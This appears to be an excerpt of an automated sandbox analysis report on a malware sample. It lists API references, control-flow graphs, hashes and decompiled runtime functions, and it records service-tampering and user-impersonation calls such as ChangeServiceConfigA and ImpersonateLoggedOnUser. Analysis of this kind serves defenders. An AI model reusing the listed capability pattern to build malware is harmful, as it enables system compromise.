                                                                        0x00402445
                                                                        0x0040244d
                                                                        0x0040244d
                                                                        0x00402445
                                                                        0x00402251
                                                                        0x0040223d
                                                                        0x0040244f
                                                                        0x0040245d
                                                                        0x0040245f
                                                                        0x00402461
                                                                        0x00402462
                                                                        0x00402467
                                                                        0x00402467
                                                                        0x0040245f
                                                                        0x004021ca
                                                                        0x0040246a
                                                                        0x0040246e
                                                                        0x00402470
                                                                        0x00402478
                                                                        0x00402478
                                                                        0x0040247a
                                                                        0x0040247e
                                                                        0x00402480
                                                                        0x00402488
                                                                        0x00402488
                                                                        0x00402480
                                                                        0x00000000
                                                                        0x00401c55
                                                                        0x00401c62
                                                                        0x00401c67
                                                                        0x00401c6a
                                                                        0x00401c6c
                                                                        0x00401c73
                                                                        0x00401c73
                                                                        0x00401c77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c7b
                                                                        0x00401c8f
                                                                        0x00401c8f
                                                                        0x00401c7d
                                                                        0x00401c7d
                                                                        0x00401c83
                                                                        0x00000000
                                                                        0x00401c85
                                                                        0x00401c85
                                                                        0x00401c88
                                                                        0x00401c8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c8d
                                                                        0x00401c83
                                                                        0x00401c98
                                                                        0x00401c9a
                                                                        0x00401cbd
                                                                        0x00401cc2
                                                                        0x00401cc5
                                                                        0x00401cc7
                                                                        0x00401cd0
                                                                        0x00401cd0
                                                                        0x00401cd2
                                                                        0x00401cd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cd6
                                                                        0x00401cd8
                                                                        0x00401cec
                                                                        0x00401cec
                                                                        0x00401cda
                                                                        0x00401cda
                                                                        0x00401cdd
                                                                        0x00401ce0
                                                                        0x00000000
                                                                        0x00401ce2
                                                                        0x00401ce2
                                                                        0x00401ce5
                                                                        0x00401ce8
                                                                        0x00401cea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cea
                                                                        0x00401ce0
                                                                        0x00401cf5
                                                                        0x00401cf5
                                                                        0x00401cf7
                                                                        0x00000000
                                                                        0x00401cf9
                                                                        0x00401d02
                                                                        0x00401d07
                                                                        0x00401d09
                                                                        0x00401d10
                                                                        0x00401d1d
                                                                        0x00401d22
                                                                        0x00401d25
                                                                        0x00401d27
                                                                        0x00401d30
                                                                        0x00401d30
                                                                        0x00401d32
                                                                        0x00401d34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d36
                                                                        0x00401d38
                                                                        0x00401d4c
                                                                        0x00401d4c
                                                                        0x00401d3a
                                                                        0x00401d3a
                                                                        0x00401d3d
                                                                        0x00401d40
                                                                        0x00000000
                                                                        0x00401d42
                                                                        0x00401d42
                                                                        0x00401d45
                                                                        0x00401d48
                                                                        0x00401d4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d4a
                                                                        0x00401d40
                                                                        0x00401d55
                                                                        0x00401d55
                                                                        0x00401d57
                                                                        0x00000000
                                                                        0x00401d5d
                                                                        0x00401d6a
                                                                        0x00401d6f
                                                                        0x00401d72
                                                                        0x00401d74
                                                                        0x00401d80
                                                                        0x00401d80
                                                                        0x00401d82
                                                                        0x00401d84
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d86
                                                                        0x00401d88
                                                                        0x00401d9c
                                                                        0x00401d9c
                                                                        0x00401d8a
                                                                        0x00401d8a
                                                                        0x00401d8d
                                                                        0x00401d90
                                                                        0x00000000
                                                                        0x00401d92
                                                                        0x00401d92
                                                                        0x00401d95
                                                                        0x00401d98
                                                                        0x00401d9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d9a
                                                                        0x00401d90
                                                                        0x00401da5
                                                                        0x00401da5
                                                                        0x00401da7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401da7
                                                                        0x00401da0
                                                                        0x00401da2
                                                                        0x00000000
                                                                        0x00401da2
                                                                        0x00000000
                                                                        0x00401d57
                                                                        0x00401d50
                                                                        0x00401d52
                                                                        0x00000000
                                                                        0x00401dad
                                                                        0x00401db6
                                                                        0x00401dbb
                                                                        0x00401dbb
                                                                        0x00401d10
                                                                        0x00000000
                                                                        0x00401d09
                                                                        0x00000000
                                                                        0x00401cf7
                                                                        0x00401cf0
                                                                        0x00401cf2
                                                                        0x00000000
                                                                        0x00401c9c
                                                                        0x00401c9c
                                                                        0x00401c9d
                                                                        0x00401caf
                                                                        0x00401caf
                                                                        0x00000000
                                                                        0x00401c9a
                                                                        0x00401c93
                                                                        0x00401c95
                                                                        0x00000000
                                                                        0x00401c95
                                                                        0x00401c4f
                                                                        0x00000000

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                        • Module32Next.KERNEL32 ref: 00401D02
                                                                        • Module32Next.KERNEL32 ref: 00401DB6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPBs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                        • API String ID: 1430744539-533690119
                                                                        • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                        • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 178 202a1a8-202a232 180 202a234-202a23e 178->180 181 202a26b-202a28d 178->181 180->181 182 202a240-202a242 180->182 186 202a2c9-202a2ea 181->186 187 202a28f-202a29c 181->187 184 202a244-202a24e 182->184 185 202a265-202a268 182->185 188 202a252-202a261 184->188 189 202a250 184->189 185->181 197 202a323-202a345 186->197 198 202a2ec-202a2f6 186->198 187->186 190 202a29e-202a2a0 187->190 188->188 191 202a263 188->191 189->188 192 202a2a2-202a2ac 190->192 193 202a2c3-202a2c6 190->193 191->185 195 202a2b0-202a2bf 192->195 196 202a2ae 192->196 193->186 195->195 199 202a2c1 195->199 196->195 204 202a381-202a3a2 197->204 205 202a347-202a354 197->205 198->197 200 202a2f8-202a2fa 198->200 199->193 202 202a2fc-202a306 200->202 203 202a31d-202a320 200->203 206 202a30a-202a319 202->206 207 202a308 202->207 203->197 215 202a3a4-202a3ae 204->215 216 202a3db-202a3fd 204->216 205->204 209 202a356-202a358 205->209 206->206 208 202a31b 206->208 207->206 208->203 210 202a35a-202a364 209->210 211 202a37b-202a37e 209->211 213 202a366 210->213 214 202a368-202a377 210->214 211->204 213->214 214->214 218 202a379 214->218 215->216 217 202a3b0-202a3b2 215->217 224 202a439-202a4b0 ChangeServiceConfigA 216->224 225 202a3ff-202a40c 216->225 219 202a3b4-202a3be 217->219 220 202a3d5-202a3d8 217->220 218->211 222 202a3c2-202a3d1 219->222 223 202a3c0 219->223 220->216 222->222 226 202a3d3 222->226 223->222 231 202a4b2-202a4b8 224->231 232 202a4b9-202a4f8 224->232 225->224 227 202a40e-202a410 225->227 226->220 229 202a412-202a41c 227->229 230 202a433-202a436 227->230 233 202a420-202a42f 229->233 234 202a41e 229->234 230->224 231->232 238 202a4fa-202a4fe 232->238 239 202a508-202a50c 232->239 233->233 236 202a431 233->236 234->233 236->230 238->239 240 202a500 238->240 241 202a50e-202a512 239->241 242 202a51c-202a520 239->242 240->239 241->242 245 202a514 241->245 243 202a522-202a526 242->243 244 202a530-202a534 242->244 243->244 246 202a528 243->246 247 202a536-202a53a 244->247 248 202a544-202a548 244->248 245->242 246->244 247->248 249 202a53c 247->249 250 202a54a-202a54e 248->250 251 202a558-202a55c 248->251 249->248 250->251 252 202a550 250->252 253 202a55e-202a562 251->253 254 202a56c 251->254 252->251 253->254 255 202a564 253->255 255->254
                                                                        APIs
                                                                        • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0202A4A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeConfigService
                                                                        • String ID:
                                                                        • API String ID: 3849694230-0
                                                                        • Opcode ID: 30bdcf7547700416ebf373270753457c99ef48b2d27a16fd7289d010c96a08dc
                                                                        • Instruction ID: 958d5a984f35d47acdb98566e8ee60eebf110c37660ac838638278faf40cefa1
                                                                        • Opcode Fuzzy Hash: 30bdcf7547700416ebf373270753457c99ef48b2d27a16fd7289d010c96a08dc
                                                                        • Instruction Fuzzy Hash: E4C16C71E007298FDB11CFA8C9857AEBBF2BF44314F10812AEC55E6280DB749889DF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 256 20296a8-202970f 258 2029711-2029736 256->258 259 202977e-2029782 256->259 268 2029766-202976b 258->268 269 2029738-202973a 258->269 260 20297c6-2029804 GetUserNameA 259->260 261 2029784-20297c2 259->261 263 2029806-202980c 260->263 264 202980d-2029823 260->264 261->260 263->264 265 2029825-2029831 264->265 266 2029839-2029860 264->266 265->266 276 2029862-2029866 266->276 277 2029870 266->277 281 202976d-2029779 268->281 272 202975c-2029764 269->272 273 202973c-2029746 269->273 272->281 279 202974a-2029758 273->279 280 2029748 273->280 276->277 282 2029868 276->282 279->279 283 202975a 279->283 280->279 281->259 282->277 283->272
                                                                        APIs
                                                                        • GetUserNameA.ADVAPI32(00000000), ref: 020297F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 2f995c6028a54c1c9d7ba3f288fb3a70bd4ea595d3d33be6e339a2ee5ad148bf
                                                                        • Instruction ID: 801e384ab9c4c97a809eb2deb334ae1c17da86a29fc578fc48bca35390b5d5bc
                                                                        • Opcode Fuzzy Hash: 2f995c6028a54c1c9d7ba3f288fb3a70bd4ea595d3d33be6e339a2ee5ad148bf
                                                                        • Instruction Fuzzy Hash: 9C512274E003198FDB14CFA9C994BDEBBF1AF48304F24802AE816AB395C7749849CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 156 40af66-40af6e 157 40af7d-40af88 call 40b84d 156->157 160 40af70-40af7b call 40d2e3 157->160 161 40af8a-40af8b 157->161 160->157 164 40af8c-40af98 160->164 165 40afb3-40afca call 40af49 call 40cd39 164->165 166 40af9a-40afb2 call 40aefc call 40d2bd 164->166 166->165
                                                                        C-Code - Quality: 63%
                                                                        			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                        				signed int _v4;
                                                                        				signed int _v16;
                                                                        				signed int _v40;
                                                                        				void* _t14;
                                                                        				signed int _t15;
                                                                        				intOrPtr* _t21;
                                                                        				signed int _t24;
                                                                        				void* _t28;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				signed int _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t51;
                                                                        
                                                                        				_t40 = __edi;
                                                                        				_t28 = __ebx;
                                                                        				_t45 = _t51;
                                                                        				while(1) {
                                                                        					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                        					if(_t14 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t15 = E0040D2E3(_a4);
                                                                        					__eflags = _t15;
                                                                        					if(_t15 == 0) {
                                                                        						__eflags =  *0x423490 & 0x00000001;
                                                                        						if(( *0x423490 & 0x00000001) == 0) {
                                                                        							 *0x423490 =  *0x423490 | 0x00000001;
                                                                        							__eflags =  *0x423490;
                                                                        							E0040AEFC(0x423484);
                                                                        							E0040D2BD( *0x423490, 0x41a704);
                                                                        						}
                                                                        						E0040AF49( &_v16, 0x423484);
                                                                        						E0040CD39( &_v16, 0x420fa4);
                                                                        						asm("int3");
                                                                        						_t47 = _t45;
                                                                        						_push(_t47);
                                                                        						_push(0xc);
                                                                        						_push(0x420ff8);
                                                                        						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                        						_t42 = _v4;
                                                                        						__eflags = _t42;
                                                                        						if(_t42 != 0) {
                                                                        							__eflags =  *0x4250b0 - 3;
                                                                        							if( *0x4250b0 != 3) {
                                                                        								_push(_t42);
                                                                        								goto L16;
                                                                        							} else {
                                                                        								E0040D6E0(_t28, 4);
                                                                        								_v16 = _v16 & 0x00000000;
                                                                        								_t24 = E0040D713(_t42);
                                                                        								_v40 = _t24;
                                                                        								__eflags = _t24;
                                                                        								if(_t24 != 0) {
                                                                        									_push(_t42);
                                                                        									_push(_t24);
                                                                        									E0040D743();
                                                                        								}
                                                                        								_v16 = 0xfffffffe;
                                                                        								_t19 = E0040B70B();
                                                                        								__eflags = _v40;
                                                                        								if(_v40 == 0) {
                                                                        									_push(_v4);
                                                                        									L16:
                                                                        									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                        									if(__eflags == 0) {
                                                                        										_t21 = E0040BFC1(__eflags);
                                                                        										 *_t21 = E0040BF7F(GetLastError());
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return E0040E21D(_t19);
                                                                        					} else {
                                                                        						continue;
                                                                        					}
                                                                        					L19:
                                                                        				}
                                                                        				return _t14;
                                                                        				goto L19;
                                                                        			}

















                                                                        0x0040af66
                                                                        0x0040af66
                                                                        0x0040af69
                                                                        0x0040af7d
                                                                        0x0040af80
                                                                        0x0040af88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af73
                                                                        0x0040af79
                                                                        0x0040af7b
                                                                        0x0040af8c
                                                                        0x0040af98
                                                                        0x0040af9a
                                                                        0x0040af9a
                                                                        0x0040afa3
                                                                        0x0040afad
                                                                        0x0040afb2
                                                                        0x0040afb7
                                                                        0x0040afc5
                                                                        0x0040afca
                                                                        0x0040afd0
                                                                        0x0040aec2
                                                                        0x0040b6b5
                                                                        0x0040b6b7
                                                                        0x0040b6bc
                                                                        0x0040b6c1
                                                                        0x0040b6c4
                                                                        0x0040b6c6
                                                                        0x0040b6c8
                                                                        0x0040b6cf
                                                                        0x0040b714
                                                                        0x00000000
                                                                        0x0040b6d1
                                                                        0x0040b6d3
                                                                        0x0040b6d9
                                                                        0x0040b6de
                                                                        0x0040b6e4
                                                                        0x0040b6e7
                                                                        0x0040b6e9
                                                                        0x0040b6eb
                                                                        0x0040b6ec
                                                                        0x0040b6ed
                                                                        0x0040b6f3
                                                                        0x0040b6f4
                                                                        0x0040b6fb
                                                                        0x0040b700
                                                                        0x0040b704
                                                                        0x0040b706
                                                                        0x0040b715
                                                                        0x0040b723
                                                                        0x0040b725
                                                                        0x0040b727
                                                                        0x0040b73a
                                                                        0x0040b73c
                                                                        0x0040b725
                                                                        0x0040b704
                                                                        0x0040b6cf
                                                                        0x0040b742
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af7b
                                                                        0x0040af8b
                                                                        0x00000000

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1411284514-0
                                                                        • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                        • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 175 40e7ee-40e7f6 call 40e7c3 177 40e7fb-40e7ff ExitProcess 175->177
                                                                        C-Code - Quality: 100%
                                                                        			E0040E7EE(int _a4) {
                                                                        
                                                                        				E0040E7C3(_a4); // executed
                                                                        				ExitProcess(_a4);
                                                                        			}



                                                                        0x0040e7f6
                                                                        0x0040e7ff

                                                                        APIs
                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                        • String ID:
                                                                        • API String ID: 2427264223-0
                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 286 20299e8-2029a49 288 2029a82-2029ad2 OpenServiceA 286->288 289 2029a4b-2029a55 286->289 296 2029ad4-2029ada 288->296 297 2029adb-2029b0c 288->297 289->288 290 2029a57-2029a59 289->290 291 2029a5b-2029a65 290->291 292 2029a7c-2029a7f 290->292 294 2029a67 291->294 295 2029a69-2029a78 291->295 292->288 294->295 295->295 298 2029a7a 295->298 296->297 301 2029b0e-2029b12 297->301 302 2029b1c 297->302 298->292 301->302 303 2029b14 301->303 303->302
                                                                        APIs
                                                                        • OpenServiceA.ADVAPI32(?,?,?), ref: 02029AC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 6ace41aadfb72a6b6c0feb8a28c8cd6daa2bc251e34da0b69961be0fa68467ee
                                                                        • Instruction ID: 972abe126b2932eb0e22730101433df338e76858e7dde678b0805e1fa59dadaa
                                                                        • Opcode Fuzzy Hash: 6ace41aadfb72a6b6c0feb8a28c8cd6daa2bc251e34da0b69961be0fa68467ee
                                                                        • Instruction Fuzzy Hash: D93155B0D003288FDB11CFA9C985B9EBBF5BB48304F24812AE819AB340D7749849DF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 304 2029920-202996f 306 2029971-2029974 304->306 307 2029977-202997b 304->307 306->307 308 2029983-20299b2 OpenSCManagerW 307->308 309 202997d-2029980 307->309 310 20299b4-20299ba 308->310 311 20299bb-20299cf 308->311 309->308 310->311
                                                                        APIs
                                                                        • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 020299A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 1889721586-0
                                                                        • Opcode ID: 2bf8d37edfcae6f310ed9dbdb8d928e5c3d1d24ee252aa3955bdd7fd6920ff50
                                                                        • Instruction ID: c3b99b88d664b011073e468a17c5c301c17010084357e630b26511197d88a121
                                                                        • Opcode Fuzzy Hash: 2bf8d37edfcae6f310ed9dbdb8d928e5c3d1d24ee252aa3955bdd7fd6920ff50
                                                                        • Instruction Fuzzy Hash: D62104B5D002199FCB50CF99D884ADEFBF4EB88324F14815AD818BB244D7759944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 313 2029180-2029201 VirtualProtect 316 2029203-2029209 313->316 317 202920a-202922f 313->317 316->317
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 020291F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 9a19ec0786c4988db57b6325ee21dce5a5d253941fc3a208a44b9a0a2b12bbd7
                                                                        • Instruction ID: 2054a308a60e114632b50805e251a65d6f6661c94aeb0f68cb0a44ce10744cf6
                                                                        • Opcode Fuzzy Hash: 9a19ec0786c4988db57b6325ee21dce5a5d253941fc3a208a44b9a0a2b12bbd7
                                                                        • Instruction Fuzzy Hash: D611F2B1D003199BCB10DFAAC884AEFFBF5EF58314F50842AD529A7240C778A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 321 202a0e8-202a165 ControlService 323 202a167-202a16d 321->323 324 202a16e-202a18f 321->324 323->324
                                                                        APIs
                                                                        • ControlService.ADVAPI32(?,?,?), ref: 0202A158
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ControlService
                                                                        • String ID:
                                                                        • API String ID: 253159669-0
                                                                        • Opcode ID: 52c6ff237f985fa1ec4e3a81e4210308813f6c29dea9a5f65b0b4358a8fce19a
                                                                        • Instruction ID: 1b28e78d4eb918597e614733801ba246fb555693211b0aabce58dad37e74f936
                                                                        • Opcode Fuzzy Hash: 52c6ff237f985fa1ec4e3a81e4210308813f6c29dea9a5f65b0b4358a8fce19a
                                                                        • Instruction Fuzzy Hash: 1911F9B1D006199FDB10CF9AC984BDEFBF4EB48324F10852AD558A7340D378A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 326 2029ed8-2029f44 ImpersonateLoggedOnUser 328 2029f46-2029f4c 326->328 329 2029f4d-2029f6e 326->329 328->329
                                                                        APIs
                                                                        • ImpersonateLoggedOnUser.KERNELBASE ref: 02029F37
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 7b8a23dd64ff5808114c7ef21c00392b6dd9ff48d50df99930581f76f507d6d3
                                                                        • Instruction ID: 9094a254690211ec4156fe51c5474d19d64a1c157e86bd60ad772c6678861e14
                                                                        • Opcode Fuzzy Hash: 7b8a23dd64ff5808114c7ef21c00392b6dd9ff48d50df99930581f76f507d6d3
                                                                        • Instruction Fuzzy Hash: 111136B1900259CFDB10CF9AC944BDEBBF8EB48324F20845AD558A3340C378A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 331 40d534-40d556 HeapCreate 332 40d558-40d559 331->332 333 40d55a-40d563 331->333
                                                                        C-Code - Quality: 100%
                                                                        			E0040D534(intOrPtr _a4) {
                                                                        				void* _t6;
                                                                        
                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                        				 *0x4234b4 = _t6;
                                                                        				if(_t6 != 0) {
                                                                        					 *0x4250b0 = 1;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t6;
                                                                        				}
                                                                        			}




                                                                        0x0040d549
                                                                        0x0040d54f
                                                                        0x0040d556
                                                                        0x0040d55d
                                                                        0x0040d563
                                                                        0x0040d559
                                                                        0x0040d559
                                                                        0x0040d559

                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                        Memory Dump Source
